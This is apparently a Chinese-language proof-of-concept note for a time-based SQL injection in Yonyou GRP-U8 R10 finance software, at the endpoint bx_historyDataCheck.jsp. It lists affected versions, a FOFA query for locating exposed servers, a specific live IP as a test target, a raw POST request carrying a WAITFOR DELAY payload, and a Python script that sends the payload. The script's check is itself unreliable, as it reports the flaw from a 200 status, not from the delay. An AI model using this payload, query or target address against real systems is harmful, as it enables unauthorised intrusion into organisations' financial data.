影响版本
用友GRP-U8R10 U8Manager B、C、G 系列产品 < 20230905
复现
fofa:app=“yonyou-GRP-U8”
测试地址
http://112.31.243.223:18080/login.jsp?up=1
时间6秒存在注入
POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host: xxxxxxxxxxxx
User-Agent: Go-http-client/1.1
Content-Length: 84
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=5FF34252A52D49B94A560C18AB894656
Accept-Encoding: gzip
userName=';WAITFOR DELAY '0:0:6'--&class.module.classLoader.DefaultAssertionStatus=
import re
import requests
url = 'http://替换部分/u8qx/bx_historyDataCheck.jsp'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '59',
'Connection': 'close'
}
data = {
"userName":"1';WAITFOR%20DELAY%20'0:0:6'--+&ysnd=&historyFlag="
}
response = requests.post(url, headers=headers, data=data)
print('Status Code:', response.status_code)
if response.status_code ==200:
print('存在用友GRP-U8 SQL注入漏洞,请尽快修复漏洞!!!')
else:
print('漏洞不存在。')